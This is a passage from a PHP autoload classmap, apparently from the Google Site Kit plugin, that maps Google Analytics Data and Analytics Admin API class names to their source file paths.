'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\PivotOrderBy' => $baseDir . '/google/apiclient-services/src/AnalyticsData/PivotOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\PivotSelection' => $baseDir . '/google/apiclient-services/src/AnalyticsData/PivotSelection.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\PropertyQuota' => $baseDir . '/google/apiclient-services/src/AnalyticsData/PropertyQuota.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\QueryAudienceExportRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/QueryAudienceExportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\QueryAudienceExportResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/QueryAudienceExportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\QuotaStatus' => $baseDir . '/google/apiclient-services/src/AnalyticsData/QuotaStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Resource\\Properties' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Resource/Properties.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Resource\\PropertiesAudienceExports' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Resource/PropertiesAudienceExports.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\ResponseMetaData' => $baseDir . '/google/apiclient-services/src/AnalyticsData/ResponseMetaData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Row' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Row.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunPivotReportRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunPivotReportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunPivotReportResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunPivotReportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunRealtimeReportRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunRealtimeReportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunRealtimeReportResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunRealtimeReportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunReportRequest' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunReportRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\RunReportResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/RunReportResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\SamplingMetadata' => $baseDir . '/google/apiclient-services/src/AnalyticsData/SamplingMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\SchemaRestrictionResponse' => $baseDir . '/google/apiclient-services/src/AnalyticsData/SchemaRestrictionResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\Status' => $baseDir . '/google/apiclient-services/src/AnalyticsData/Status.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\StringFilter' => $baseDir . '/google/apiclient-services/src/AnalyticsData/StringFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\V1betaAudienceDimension' => $baseDir . '/google/apiclient-services/src/AnalyticsData/V1betaAudienceDimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\V1betaAudienceDimensionValue' => $baseDir . '/google/apiclient-services/src/AnalyticsData/V1betaAudienceDimensionValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\AnalyticsData\\V1betaAudienceRow' => $baseDir . '/google/apiclient-services/src/AnalyticsData/V1betaAudienceRow.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Exception' => $baseDir . '/google/apiclient/src/Service/Exception.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessBetweenFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessBetweenFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessDateRange' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessDateRange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessDimension' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessDimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessDimensionHeader' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessDimensionHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessDimensionValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessDimensionValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessFilterExpression' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessFilterExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessFilterExpressionList.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessInListFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessInListFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessMetric' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessMetric.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessMetricHeader' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessMetricHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessMetricValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessMetricValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessNumericFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessNumericFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessQuota' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessQuota.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessQuotaStatus' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessQuotaStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessRow' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessRow.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccessStringFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccessStringFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccount' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccount.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAccountSummary' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAccountSummary.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAndroidAppDataStream' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAndroidAppDataStream.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaArchiveAudienceRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaArchiveAudienceRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaArchiveCustomDimensionRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaArchiveCustomDimensionRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaArchiveCustomMetricRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaArchiveCustomMetricRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAttributionSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAttributionSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudience' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudience.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceEventFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceEventFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceEventTrigger' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceEventTrigger.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceFilterClause' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceFilterClause.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceFilterExpression' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceFilterExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceSequenceFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceSequenceFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAudienceSimpleFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAudienceSimpleFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAuditUserLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAuditUserLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAuditUserLinksRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaAuditUserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaChangeHistoryChange' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaChangeHistoryChange.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaChangeHistoryEvent' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaChangeHistoryEvent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaConversionEvent' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaConversionEvent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaCreateUserLinkRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaCreateUserLinkRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaCustomDimension' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaCustomDimension.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaCustomMetric' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaCustomMetric.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataRetentionSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataRetentionSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataSharingSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataSharingSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataStream' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataStream.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDataStreamWebStreamData' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDataStreamWebStreamData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaEnhancedMeasurementSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaEnhancedMeasurementSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSet' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSet.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSetFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSetFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSetFilterInListFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaFirebaseLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaFirebaseLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaGlobalSiteTag' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaGlobalSiteTag.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaGoogleAdsLink' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaGoogleAdsLink.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaGoogleSignalsSettings' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaGoogleSignalsSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaIosAppDataStream' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaIosAppDataStream.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListAccountSummariesResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListAccountSummariesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListAccountsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListAccountsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListAudiencesResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListAudiencesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\GoogleAnalyticsAdminV1alphaListConversionEventsResponse' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/GoogleAnalyticsAdminV1alphaListConversionEventsResponse.php', 